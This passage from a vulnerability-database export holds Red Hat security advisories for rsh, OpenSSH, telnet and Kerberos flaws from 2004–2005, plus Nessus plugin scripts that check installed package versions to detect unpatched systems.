to arbitrary\r\nfiles outside of the current directory. This could potentially cause a\r\nsecurity issue if a user uses rcp to copy files from a malicious server. \r\nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has\r\nassigned the name CAN-2004-0175 to this issue.\r\n\r\nAll users of rsh should upgrade to these updated packages, which resolve\r\nthese issues.", "modified": "2018-03-14T19:27:45", "published": "2005-06-13T04:00:00", "id": "RHSA-2005:495", "href": "https://access.redhat.com/errata/RHSA-2005:495", "type": "redhat", "title": "(RHSA-2005:495) rsh security update", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-08-13T18:47:07", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0175"], "description": "OpenSSH is OpenBSD's SSH (Secure SHell) protocol implementation. SSH\nreplaces rlogin and rsh, and provides secure encrypted communications\nbetween two untrusted hosts over an insecure network. X11 connections and\narbitrary TCP/IP ports can also be forwarded over a secure channel. Public\nkey authentication can be used for \"passwordless\" access to servers.\n\nThe scp protocol allows a server to instruct a client to write to arbitrary\nfiles outside of the current directory. This could potentially cause a\nsecurity issue if a user uses scp to copy files from a malicious server.\nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has\nassigned the name CAN-2004-0175 to this issue.\n\nThese updated packages also correct the following bugs:\n\nOn systems where direct ssh access for the root user was disabled by\nconfiguration (setting \"PermitRootLogin no\"), attempts to guess the root\npassword could be judged as sucessful or unsucessful by observing a delay.\n\nOn systems where the privilege separation feature was turned on, the user\nresource limits were not correctly set if the configuration specified to\nraise them above the defaults. It was also not possible to change an\nexpired password.\n\nUsers of openssh should upgrade to these updated packages, which contain\nbackported patches to resolve these issues.", "modified": "2017-07-29T20:30:22", "published": "2005-05-18T04:00:00", "id": "RHSA-2005:106", "href": "https://access.redhat.com/errata/RHSA-2005:106", "type": "redhat", "title": "(RHSA-2005:106) openssh security update", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-08-13T18:45:37", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0175"], "description": "The rsh package contains a set of programs that allow users to run\ncommands on remote machines, login to other machines, and copy files\nbetween machines, using the rsh, rlogin, and rcp commands. All three of\nthese commands use rhosts-style authentication.\n\nThe rcp protocol allows a server to instruct a client to write to arbitrary\nfiles outside of the current directory. This could potentially cause a\nsecurity issue if a user uses rcp to copy files from a malicious server.\nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has\nassigned the name CAN-2004-0175 to this issue.\n\nThese updated packages also address the following bugs:\n\nThe rlogind server reported \"SIGCHLD set to SIG_IGN but calls wait()\"\nmessage to the system log because the original BSD code was ported\nincorrectly to linux.\n\nThe rexecd server did not function on systems where client hostnames were\nnot in the DNS service, because server code called gethostbyaddr() for each\nnew connection.\n\nThe rcp command incorrectly used the \"errno\" variable and produced\nerroneous error messages.\n\nThe rexecd command ignored settings in the /etc/security/limits file,\nbecause the PAM session was incorrectly initialized.\n\nAll users of rsh should upgrade to these updated packages, which resolve\nthese issues.", "modified": "2017-09-08T12:09:34", "published": "2005-06-08T04:00:00", "id": "RHSA-2005:165", "href": "https://access.redhat.com/errata/RHSA-2005:165", "type": "redhat", "title": "(RHSA-2005:165) rsh security update", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-08-13T18:44:49", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0175"], "description": "OpenSSH is OpenBSD's SSH (Secure SHell) protocol implementation. SSH\r\nreplaces rlogin and rsh, and provides secure encrypted communications\r\nbetween two untrusted hosts over an insecure network. X11 connections and\r\narbitrary TCP/IP ports can also be forwarded over a secure channel. Public\r\nkey authentication can be used for \"passwordless\" access to servers.\r\n\r\nThe scp protocol allows a server to instruct a client to write to arbitrary\r\nfiles outside of the current directory. This could potentially cause a\r\nsecurity issue if a user uses scp to copy files from a malicious server.\r\nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has\r\nassigned the name CAN-2004-0175 to this issue.\r\n\r\nThese updated packages also correct the following bug:\r\n\r\nOn systems in which direct ssh access for the root user was disabled by\r\nconfiguration (setting \"PermitRootLogin no\"), attempts to guess the root\r\npassword could be judged as sucessful or unsucessful by observing a delay.\r\n\r\nUsers of openssh should upgrade to these updated packages, which contain\r\nbackported patches to resolve these issues.", "modified": "2018-03-14T19:27:16", "published": "2005-06-02T04:00:00", "id": "RHSA-2005:481", "href": "https://access.redhat.com/errata/RHSA-2005:481", "type": "redhat", "title": "(RHSA-2005:481) openssh security update", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-08-13T18:45:58", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0175"], "description": "The rsh package contains a set of programs that allow users to run\ncommands on remote machines, login to other machines, and copy files\nbetween machines, using the rsh, rlogin, and rcp commands. All three of\nthese commands use rhosts-style authentication.\n\nThe rcp protocol allows a server to instruct a client to write to arbitrary\nfiles outside of the current directory. This could potentially cause a\nsecurity issue if a user uses rcp to copy files from a malicious server. \nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has\nassigned the name CAN-2004-0175 to this issue.\n\nThese updated packages also address the following bugs:\n\nThe rexec command failed with \"Invalid Argument\", because the code\nused sigaction() as an unsupported signal.\n\nThe rlogind server reported \"SIGCHLD set to SIG_IGN but calls wait()\"\nmessage to the system log because the original BSD code was ported\nincorrectly to linux.\n\nThe rexecd server did not function on systems where client hostnames were\nnot in the DNS service, because server code called gethostbyaddr() for each\nnew connection.\n\nThe rcp command incorrectly used the \"errno\" variable and produced\nerroneous error messages.\n\nThe rexecd command ignored settings in the /etc/security/limits file,\nbecause the PAM session was incorrectly initialized.\n\nThe rexec command prompted for username and password regardless of the\n~/.netrc configuration file contents. This updated package contains a patch\nthat no longer skips the ~/.netrc file. \n\nAll users of rsh should upgrade to these updated packages, which resolve\nthese issues.", "modified": "2017-07-29T20:31:51", "published": "2005-05-18T04:00:00", "id": "RHSA-2005:074", "href": "https://access.redhat.com/errata/RHSA-2005:074", "type": "redhat", "title": "(RHSA-2005:074) rsh security update", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-08-13T18:45:26", "bulletinFamily": "unix", "cvelist": ["CVE-2005-0488"], "description": "The telnet package provides a command line telnet client. \r\n\r\nGael Delalleau discovered an information disclosure issue in the way the\r\ntelnet client handles messages from a server. An attacker could construct\r\na malicious telnet server that collects information from the environment of\r\nany victim who connects to it. The Common Vulnerabilities and Exposures\r\nproject (cve.mitre.org) has assigned the name CAN-2005-0488 to this issue.\r\n\r\nUsers of telnet should upgrade to this updated package, which contains a\r\nbackported patch to correct this issue.", "modified": "2018-03-14T19:25:50", "published": "2005-06-14T04:00:00", "id": "RHSA-2005:504", "href": "https://access.redhat.com/errata/RHSA-2005:504", "type": "redhat", "title": "(RHSA-2005:504) telnet security update", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "nessus": [{"lastseen": "2020-09-04T04:53:41", "description": "Updated krb5 packages which fix multiple security issues are now\navailable for Red Hat Enterprise Linux 2.1 and 3.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\n[Updated 26 Sep 2005] krb5-server packages have been added to this\nadvisory for Red Hat Enterprise Linux 3 WS and Red Hat Enterprise\nLinux 3 Desktop.\n\nKerberos is a networked authentication system which uses a trusted\nthird party (a KDC) to authenticate clients and servers to each other.\n\nA double-free flaw was found in the krb5_recvauth() routine which may\nbe triggered by a remote unauthenticated attacker. Although no exploit\nis currently known to exist, this issue could potentially be exploited\nto allow arbitrary code execution on a Key Distribution Center (KDC).\nThe Common Vulnerabilities and Exposures project assigned the name\nCVE-2005-1689 to this issue.\n\nDaniel Wachdorf discovered a single byte heap overflow in the\nkrb5_unparse_name() function, part of krb5-libs. Sucessful\nexploitation of this flaw would lead to a denial of service (crash).\nTo trigger this flaw an attacker would need to have control of a\nkerberos realm that shares a cross-realm key with the target, making\nexploitation of this flaw unlikely. (CVE-2005-1175).\n\nGael Delalleau discovered an information disclosure issue in the way\nsome telnet clients handle messages from a server. An attacker could\nconstruct a malicious telnet server that collects information from the\nenvironment of any victim who connects to it using the Kerberos-aware\ntelnet client (CVE-2005-0488).\n\nThe rcp protocol allows a server to instruct a client to write to\narbitrary files outside of the current directory. This could\npotentially cause a security issue if a user uses the Kerberos-aware\nrcp to copy files from a malicious server (CVE-2004-0175).\n\nAll users of krb5 should update to these erratum packages which\ncontain backported patches to correct these issues. Red Hat would like\nto thank the MIT Kerberos Development Team for their responsible\ndisclosure of these issues.", "edition": 21, "published": "2005-07-13T00:00:00", "title": "RHEL 2.1 / 3 : krb5 (RHSA-2005:562)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-1689", "CVE-2005-0488", "CVE-2005-1175", "CVE-2004-0175"], "modified": "2020-09-02T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:3", "cpe:/o:redhat:enterprise_linux:2.1", "p-cpe:/a:redhat:enterprise_linux:krb5-libs", "p-cpe:/a:redhat:enterprise_linux:krb5-devel", "p-cpe:/a:redhat:enterprise_linux:krb5-workstation", "p-cpe:/a:redhat:enterprise_linux:krb5-server"], "id": "REDHAT-RHSA-2005-562.NASL", "href": "https://www.tenable.com/plugins/nessus/18687", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2005:562. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(18687);\n script_version (\"1.27\");\n script_cvs_date(\"Date: 2019/10/25 13:36:11\");\n\n script_cve_id(\"CVE-2004-0175\", \"CVE-2005-0488\", \"CVE-2005-1175\", \"CVE-2005-1689\");\n script_xref(name:\"RHSA\", value:\"2005:562\");\n\n script_name(english:\"RHEL 2.1 / 3 : krb5 (RHSA-2005:562)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated krb5 packages which fix multiple security issues are now\navailable for Red Hat Enterprise Linux 2.1 and 3.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\n[Updated 26 Sep 2005] krb5-server packages have been added to this\nadvisory for Red Hat Enterprise Linux 3 WS and Red Hat Enterprise\nLinux 3 Desktop.\n\nKerberos is a networked authentication system which uses a trusted\nthird party (a KDC) to authenticate clients and servers to each other.\n\nA double-free flaw was found in the krb5_recvauth() routine which may\nbe triggered by a remote unauthenticated attacker. Although no exploit\nis currently known to exist, this issue could potentially be exploited\nto allow arbitrary code execution on a Key Distribution Center (KDC).\nThe Common Vulnerabilities and Exposures project assigned the name\nCVE-2005-1689 to this issue.\n\nDaniel Wachdorf discovered a single byte heap overflow in the\nkrb5_unparse_name() function, part of krb5-libs. Sucessful\nexploitation of this flaw would lead to a denial of service (crash).\nTo trigger this flaw an attacker would need to have control of a\nkerberos realm that shares a cross-realm key with the target, making\nexploitation of this flaw unlikely. (CVE-2005-1175).\n\nGael Delalleau discovered an information disclosure issue in the way\nsome telnet clients handle messages from a server. An attacker could\nconstruct a malicious telnet server that collects information from the\nenvironment of any victim who connects to it using the Kerberos-aware\ntelnet client (CVE-2005-0488).\n\nThe rcp protocol allows a server to instruct a client to write to\narbitrary files outside of the current directory. This could\npotentially cause a security issue if a user uses the Kerberos-aware\nrcp to copy files from a malicious server (CVE-2004-0175).\n\nAll users of krb5 should update to these erratum packages which\ncontain backported patches to correct these issues. Red Hat would like\nto thank the MIT Kerberos Development Team for their responsible\ndisclosure of these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2004-0175\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2005-0488\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2005-1175\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2005-1689\"\n );\n # http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2005-003-recvauth.txt\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?20d6a900\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2005-002-kdc.txt\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2005:562\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cwe_id(22, 119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:krb5-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:krb5-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:krb5-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:krb5-workstation\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:2.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/08/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/10/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/07/13\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(2\\.1|3)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 2.1 / 3.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2005:562\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"krb5-devel-1.2.2-37\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"krb5-libs-1.2.2-37\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"krb5-server-1.2.2-37\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"krb5-workstation-1.2.2-37\")) flag++;\n\n if (rpm_check(release:\"RHEL3\", reference:\"krb5-devel-1.2.7-47\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"krb5-libs-1.2.7-47\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"krb5-server-1.2.7-47\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"krb5-workstation-1.2.7-47\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"krb5-devel / krb5-libs / krb5-server / krb5-workstation\");\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-04T01:11:44", "description": "Updated krb5 packages which fix multiple security issues are now\navailable for Red Hat Enterprise Linux 2.1 and 3.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\n[Updated 26 Sep 2005] krb5-server packages have been added to this\nadvisory for Red Hat Enterprise Linux 3 WS and Red Hat Enterprise\nLinux 3 Desktop.\n\nKerberos is a networked authentication system which uses a trusted\nthird party (a KDC) to authenticate clients and servers to each other.\n\nA double-free flaw was found in the krb5_recvauth() routine which may\nbe triggered by a remote unauthenticated attacker. Although no exploit\nis currently known to exist, this issue could potentially be exploited\nto allow arbitrary code execution on a Key Distribution Center (KDC).\nThe Common Vulnerabilities and Exposures project assigned the name\nCVE-2005-1689 to this issue.\n\nDaniel Wachdorf discovered a single byte heap overflow in the\nkrb5_unparse_name() function, part of krb5-libs. Sucessful\nexploitation of this flaw would lead to a denial of service (crash).\nTo trigger this flaw an attacker would need to have control of a\nkerberos realm that shares a cross-realm key with the target, making\nexploitation of this flaw unlikely. (CVE-2005-1175).\n\nGael Delalleau discovered an information disclosure issue in the way\nsome telnet clients handle messages from a server. An attacker could\nconstruct a malicious telnet server that collects information from the\nenvironment of any victim who connects to it using the Kerberos-aware\ntelnet client (CVE-2005-0488).\n\nThe rcp protocol allows a server to instruct a client to write to\narbitrary files outside of the current directory. This could\npotentially cause a security issue if a user uses the Kerberos-aware\nrcp to copy files from a malicious server (CVE-2004-0175).\n\nAll users of krb5 should update to these erratum packages which\ncontain backported patches to correct these issues. Red Hat would like\nto thank the MIT Kerberos Development Team for their responsible\ndisclosure of these issues.", "edition": 21, "published": "2006-07-03T00:00:00", "title": "CentOS 3 : krb5 (CESA-2005:562)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-1689", "CVE-2005-0488", "CVE-2005-1175", "CVE-2004-0175"], "modified": "2020-09-02T00:00:00", "cpe": ["p-cpe:/a:centos:centos:krb5-workstation", "p-cpe:/a:centos:centos:krb5-devel", "p-cpe:/a:centos:centos:krb5-server", "p-cpe:/a:centos:centos:krb5-libs", "cpe:/o:centos:centos:3"], "id": "CENTOS_RHSA-2005-562.NASL", "href": "https://www.tenable.com/plugins/nessus/21840", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2005:562 and \n# CentOS Errata and Security Advisory 2005:562 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(21840);\n script_version(\"1.19\");\n script_cvs_date(\"Date: 2019/10/25 13:36:02\");\n\n script_cve_id(\"CVE-2004-0175\", \"CVE-2005-0488\", \"CVE-2005-1175\", \"CVE-2005-1689\");\n script_xref(name:\"RHSA\", value:\"2005:562\");\n\n script_name(english:\"CentOS 3 : krb5 (CESA-2005:562)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated krb5 packages which fix multiple security issues are now\navailable for Red Hat Enterprise Linux 2.1 and 3.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\n[Updated 26 Sep 2005] krb5-server packages have been added to this\nadvisory for Red Hat Enterprise Linux 3 WS and Red Hat Enterprise\nLinux 3 Desktop.\n\nKerberos is a networked authentication system which uses a trusted\nthird party (a KDC) to authenticate clients and servers to each other.\n\nA double-free flaw was found in the krb5_recvauth() routine which may\nbe triggered by a remote unauthenticated attacker. Although no exploit\nis currently known to exist, this issue could potentially be exploited\nto allow arbitrary code execution on a Key Distribution Center (KDC).\nThe Common Vulnerabilities and Exposures project assigned the name\nCVE-2005-1689 to this issue.\n\nDaniel Wachdorf discovered a single byte heap overflow in the\nkrb5_unparse_name() function, part of krb5-libs. Sucessful\nexploitation of this flaw would lead to a denial of service (crash).\nTo trigger this flaw an attacker would need to have control of a\nkerberos realm that shares a cross-realm key with the target, making\nexploitation of this flaw unlikely. (CVE-2005-1175).\n\nGael Delalleau discovered an information disclosure issue in the way\nsome telnet clients handle messages from a server. An attacker could\nconstruct a malicious telnet server that collects information from the\nenvironment of any victim who connects to it using the Kerberos-aware\ntelnet client (CVE-2005-0488).\n\nThe rcp protocol allows a server to instruct a client to write to\narbitrary files outside of the current directory. This could\npotentially cause a security issue if a user uses the Kerberos-aware\nrcp to copy files from a malicious server (CVE-2004-0175).\n\nAll users of krb5 should update to these erratum packages which\ncontain backported patches to correct these issues. Red Hat would like\nto thank the MIT Kerberos Development Team for their responsible\ndisclosure of these issues.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2005-July/011925.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6208d2e8\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2005-July/011926.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2280e855\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2005-July/011930.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?9922a817\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected krb5 packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cwe_id(22, 119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:krb5-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:krb5-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:krb5-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:krb5-workstation\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/08/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/07/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/07/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^3([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 3.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-3\", reference:\"krb5-devel-1.2.7-47\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"krb5-libs-1.2.7-47\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"krb5-server-1.2.7-47\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"krb5-workstation-1.2.7-47\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"krb5-devel / krb5-libs / krb5-server / krb5-workstation\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-04T01:11:44", "description": "Updated krb5 packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 4.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nKerberos is a networked authentication system that uses a trusted\nthird party (a KDC) to authenticate clients and servers to each other.\n\nA double-free flaw was found in the krb5_recvauth() routine which may\nbe triggered by a remote unauthenticated attacker. Red Hat Enterprise\nLinux 4 contains checks within glibc that detect double-free flaws.\nTherefore, on Red Hat Enterprise Linux 4 successful exploitation of\nthis issue can only lead to a denial of service (KDC crash). The\nCommon Vulnerabilities and Exposures project assigned the name\nCVE-2005-1689 to this issue.\n\nDaniel Wachdorf discovered a single byte heap overflow in the\nkrb5_unparse_name() function, part of krb5-libs. Sucessful\nexploitation of this flaw would lead to a denial of service (crash).\nTo trigger this flaw an attacker would need to have control of a\nkerberos realm that shares a cross-realm key with the target, making\nexploitation of this flaw unlikely. (CVE-2005-1175).\n\nDaniel Wachdorf also discovered that in error conditions that may\noccur in response to correctly-formatted client requests, the Kerberos\n5 KDC may attempt to free uninitialized memory. This could allow a\nremote attacker to cause a denial of service (KDC crash)\n(CVE-2005-1174).\n\nGael Delalleau discovered an information disclosure issue in the way\nsome telnet clients handle messages from a server. An attacker could\nconstruct a malicious telnet server that collects information from the\nenvironment of any victim who connects to it using the Kerberos-aware\ntelnet client (CVE-2005-0488).\n\nThe rcp protocol allows a server to instruct a client to write to\narbitrary files outside of the current directory. This could\npotentially cause a security issue if a user uses the Kerberos-aware\nrcp to copy files from a malicious server (CVE-2004-0175).\n\nAll users of krb5 should update to these erratum packages, which\ncontain backported patches to correct these issues. Red Hat would like\nto thank the MIT Kerberos Development Team for their responsible\ndisclosure of these issues.", "edition": 22, "published": "2006-07-05T00:00:00", "title": "CentOS 4 : krb5 (CESA-2005:567)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-1689", "CVE-2005-1174", "CVE-2005-0488", "CVE-2005-1175", "CVE-2004-0175"], "modified": "2020-09-02T00:00:00", "cpe": ["p-cpe:/a:centos:centos:krb5-workstation", "p-cpe:/a:centos:centos:krb5-devel", "cpe:/o:centos:centos:4", "p-cpe:/a:centos:centos:krb5-server", "p-cpe:/a:centos:centos:krb5-libs"], "id": "CENTOS_RHSA-2005-567.NASL", "href": "https://www.tenable.com/plugins/nessus/21946", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2005:567 and \n# CentOS Errata and Security Advisory 2005:567 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(21946);\n script_version(\"1.19\");\n script_cvs_date(\"Date: 2019/10/25 13:36:02\");\n\n script_cve_id(\"CVE-2004-0175\", \"CVE-2005-1174\", \"CVE-2005-1175\", \"CVE-2005-1689\");\n script_xref(name:\"RHSA\", value:\"2005:567\");\n\n script_name(english:\"CentOS 4 : krb5 (CESA-2005:567)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated krb5 packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 4.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nKerberos is a networked authentication system that uses a trusted\nthird party (a KDC) to authenticate clients and servers to each other.\n\nA double-free flaw 